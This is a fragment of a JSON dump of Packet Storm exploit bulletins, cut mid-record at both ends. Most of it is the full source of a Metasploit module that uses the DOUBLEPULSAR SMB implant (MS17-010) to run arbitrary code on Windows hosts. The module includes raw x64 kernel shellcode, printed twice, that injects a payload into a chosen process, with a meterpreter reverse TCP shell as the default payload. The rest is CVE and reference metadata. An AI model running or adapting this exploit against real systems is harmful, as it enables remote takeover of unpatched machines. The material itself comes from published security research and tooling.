\n\"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" + \n\"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" + \n\"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" + 
\n\"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" + \n\"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" + \n\"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" + \n\"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" + \n\"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" + \n\"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" + \n\"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" + \n\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" + \n\"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" + \n\"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" + \n\"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" + \n\"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" + \n\"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" + \n\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" + \n\"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" + \n\"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" + \n\"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" + \n\"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" + \n\"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" + \n\"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" + \n\"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" + \n\"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" + 
\n\"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\" \nend \n \ndef kernel_shellcode_size \nmake_kernel_shellcode('').length \nend \n \nend \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "PACKETSTORM:156196", "hash": "c7d1e84efcb5229ac3bbe4b9c2098b31", "type": "packetstorm", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution", "description": "", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "reporter": "Luke Jennings", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2020-02-06T14:50:28", "history": [], "viewCount": 140, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": 
"metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": 
["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-02-06T14:50:28", "rev": 2}, "score": {"value": 8.6, "vector": "NONE", "modified": "2020-02-06T14:50:28", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://packetstormsecurity.com/files/download/156196/smb_doublepulsar_rce.rb.txt", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::SMB::Client \ninclude Msf::Module::Deprecated \n \nmoved_from 'exploit/windows/smb/doublepulsar_rce' \n \nMAX_SHELLCODE_SIZE = 4096 \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'SMB DOUBLEPULSAR Remote Code Execution', \n'Description' => %q{ 
\nThis module executes a Metasploit payload against the Equation Group's \nDOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. \n \nWhile this module primarily performs code execution against the implant, \nthe \"Neutralize implant\" target allows you to disable the implant. \n}, \n'Author' => [ \n'Equation Group', # DOUBLEPULSAR implant \n'Shadow Brokers', # Equation Group dump \n'zerosum0x0', # DOPU analysis and detection \n'Luke Jennings', # DOPU analysis and detection \n'wvu', # Metasploit module and arch detection \n'Jacob Robles' # Metasploit module and RCE help \n], \n'References' => [ \n['MSB', 'MS17-010'], \n['CVE', '2017-0143'], \n['CVE', '2017-0144'], \n['CVE', '2017-0145'], \n['CVE', '2017-0146'], \n['CVE', '2017-0147'], \n['CVE', '2017-0148'], \n['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'], \n['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'], \n['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'], \n['URL', 'https://github.com/countercept/doublepulsar-detection-script'], \n['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'], \n['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'] \n], \n'DisclosureDate' => '2017-04-14', # Shadow Brokers leak \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'Arch' => ARCH_X64, \n'Privileged' => true, \n'Payload' => { \n'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size, \n'DisableNops' => true \n}, \n'Targets' => [ \n['Execute payload (x64)', \n'DefaultOptions' => { \n'EXITFUNC' => 'thread', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' \n} \n], \n['Neutralize implant', \n'DefaultOptions' => { \n'PAYLOAD' => nil # XXX: \"Unset\" generic payload \n} \n] \n], \n'DefaultTarget' => 0, \n'Notes' => { \n'AKA' => ['DOUBLEPULSAR'], \n'RelatedModules' => [ \n'auxiliary/scanner/smb/smb_ms17_010', 
\n'exploit/windows/smb/ms17_010_eternalblue' \n], \n'Stability' => [CRASH_OS_DOWN], \n'Reliability' => [REPEATABLE_SESSION] \n} \n)) \n \nregister_advanced_options([ \nOptBool.new('DefangedMode', [true, 'Run in defanged mode', true]), \nOptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe']) \n]) \nend \n \nOPCODES = { \nping: 0x23, \nexec: 0xc8, \nkill: 0x77 \n}.freeze \n \nSTATUS_CODES = { \nnot_detected: 0x00, \nsuccess: 0x10, \ninvalid_params: 0x20, \nalloc_failure: 0x30 \n}.freeze \n \ndef calculate_doublepulsar_status(m1, m2) \nSTATUS_CODES.key(m2.to_i - m1.to_i) \nend \n \n# algorithm to calculate the XOR Key for DoublePulsar knocks \ndef calculate_doublepulsar_xor_key(s) \nx = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8))) \nx & 0xffffffff # this line was added just to truncate to 32 bits \nend \n \n# The arch is adjacent to the XOR key in the SMB signature \ndef calculate_doublepulsar_arch(s) \ns == 0 ? ARCH_X86 : ARCH_X64 \nend \n \ndef generate_doublepulsar_timeout(op) \nk = SecureRandom.random_bytes(4).unpack1('V') \n0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00 \nend \n \ndef generate_doublepulsar_param(op, body) \ncase OPCODES.key(op) \nwhen :ping, :kill \n\"\\x00\" * 12 \nwhen :exec \nRex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*')) \nend \nend \n \ndef check \nipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\" \n \n@tree_id = do_smb_setup_tree(ipc_share) \nvprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\") \nvprint_status(\"Target OS is #{smb_peer_os}\") \n \nprint_status('Sending ping to DOUBLEPULSAR') \ncode, signature1, signature2 = do_smb_doublepulsar_pkt \nmsg = 'Host is likely INFECTED with DoublePulsar!' 
\n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \n@xor_key = calculate_doublepulsar_xor_key(signature1) \n@arch = calculate_doublepulsar_arch(signature2) \n \narch_str = \ncase @arch \nwhen ARCH_X86 \n'x86 (32-bit)' \nwhen ARCH_X64 \n'x64 (64-bit)' \nend \n \nprint_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\") \nCheckCode::Vulnerable \nwhen :not_detected \nprint_error('DOUBLEPULSAR not detected or disabled') \nCheckCode::Safe \nelse \nprint_error('An unknown error occurred') \nCheckCode::Unknown \nend \nend \n \ndef exploit \nif datastore['DefangedMode'] \nwarning = <<~EOF \n \n \nAre you SURE you want to execute code against a nation-state implant? \nYou MAY contaminate forensic evidence if there is an investigation. \n \nDisable the DefangedMode option if you have authorization to proceed. \nEOF \n \nfail_with(Failure::BadConfig, warning) \nend \n \n# No ForceExploit because @tree_id and @xor_key are required \nunless check == CheckCode::Vulnerable \nfail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR') \nend \n \ncase target.name \nwhen 'Execute payload (x64)' \nunless @xor_key \nfail_with(Failure::NotFound, 'XOR key not found') \nend \n \nif @arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'x86 is not a supported target') \nend \n \nprint_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\") \nshellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName']) \nshellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length) \nvprint_status(\"Total shellcode length: #{shellcode.length} bytes\") \n \nprint_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\") \nxor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode) \n \nprint_status('Sending shellcode to DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode) \nwhen 'Neutralize implant' \nreturn neutralize_implant \nend \n 
\ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Payload execution successful') \nwhen :invalid_params \nfail_with(Failure::BadConfig, 'Invalid parameters were specified') \nwhen :alloc_failure \nfail_with(Failure::PayloadFailed, 'An allocation failure occurred') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nensure \ndisconnect \nend \n \ndef neutralize_implant \nprint_status('Neutralizing DOUBLEPULSAR') \ncode, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill]) \n \ncase calculate_doublepulsar_status(@multiplex_id, code) \nwhen :success \nprint_good('Implant neutralization successful') \nelse \nfail_with(Failure::Unknown, 'An unknown error occurred') \nend \nend \n \ndef do_smb_setup_tree(ipc_share) \nconnect \n \n# logon as user \\ \nsimple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain']) \n \n# connect to IPC$ \nsimple.connect(ipc_share) \n \n# return tree \nsimple.shares[ipc_share] \nend \n \ndef do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil) \n# make doublepulsar knock \npkt = make_smb_trans2_doublepulsar(opcode, body) \n \nsock.put(pkt) \nbytes = sock.get_once \n \nreturn unless bytes \n \n# convert packet to response struct \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct \npkt.from_s(bytes[4..-1]) \n \nreturn pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2'] \nend \n \ndef make_smb_trans2_doublepulsar(opcode, body) \nsetup_count = 1 \nsetup_data = [0x000e].pack('v') \n \nparam = generate_doublepulsar_param(opcode, body) \ndata = param + body.to_s \n \npkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct \nsimple.client.smb_defaults(pkt['Payload']['SMB']) \n \nbase_offset = pkt.to_s.length + (setup_count * 2) - 4 \nparam_offset = base_offset \ndata_offset = param_offset + param.length \n \npkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2 
\npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0xc007 \n \n@multiplex_id = rand(0xffff) \n \npkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count \npkt['Payload']['SMB'].v['TreeID'] = @tree_id \npkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id \n \npkt['Payload'].v['ParamCountTotal'] = param.length \npkt['Payload'].v['DataCountTotal'] = body.to_s.length \npkt['Payload'].v['ParamCountMax'] = 1 \npkt['Payload'].v['DataCountMax'] = 0 \npkt['Payload'].v['ParamCount'] = param.length \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['DataCount'] = body.to_s.length \npkt['Payload'].v['DataOffset'] = data_offset \npkt['Payload'].v['SetupCount'] = setup_count \npkt['Payload'].v['SetupData'] = setup_data \npkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode) \npkt['Payload'].v['Payload'] = data \n \npkt.to_s \nend \n \n# ring3 = user mode encoded payload \n# proc_name = process to inject APC into \ndef make_kernel_user_payload(ring3, proc_name) \nsc = make_kernel_shellcode(proc_name) \n \nsc << [ring3.length].pack('S<') \nsc << ring3 \n \nsc \nend \n \ndef generate_process_hash(process) \n# x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \nproc_hash = 0 \nprocess << \"\\x00\" \n \nprocess.each_byte do |c| \nproc_hash = ror(proc_hash, 13) \nproc_hash += c \nend \n \n[proc_hash].pack('l<') \nend \n \ndef ror(dword, bits) \n(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF \nend \n \ndef make_kernel_shellcode(proc_name) \n# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm \n# Length: 780 bytes \n\"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\ \n\"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\ \n\"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\ \n\"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" 
\\ \n\"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\ \n\"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\ \n\"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\ \n\"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\ \n\"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\ \n\"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\ \n\"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\ \n\"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\ \n\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" + \ngenerate_process_hash(proc_name.upcase) + \n\"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\ \n\"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\ \n\"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\ \n\"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\ \n\"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\ \n\"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\ \n\"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\ \n\"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\ \n\"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\ \n\"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\ \n\"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\ \n\"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\ 
\n\"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\ \n\"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\ \n\"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\ \n\"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\ \n\"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\ \n\"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\ \n\"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\ \n\"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\ \n\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\ \n\"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\ \n\"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\ \n\"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\ \n\"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\ \n\"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\ \n\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\ \n\"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\ \n\"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\ \n\"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\ \n\"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\ \n\"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\ \n\"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\ \n\"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\ 
\n\"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\ \n\"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\" \nend \n \ndef kernel_shellcode_size \nmake_kernel_shellcode('').length \nend \n \nend \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "PACKETSTORM:142181", "hash": "bcbbdfdd250da7f17456f3ca52987294", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Microsoft Windows MS17-010 SMB Remote Code Execution", "description": "", "published": "2017-04-17T00:00:00", "modified": "2017-04-17T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 9.3}, "href": "https://packetstormsecurity.com/files/142181/Microsoft-Windows-MS17-010-SMB-Remote-Code-Execution.html", "reporter": "Sean Dillon", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2017-04-18T01:24:55", "history": [], "viewCount": 3991, "enchantments": {"score": {"value": 8.3, "vector": "NONE", "modified": "2017-04-18T01:24:55", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": 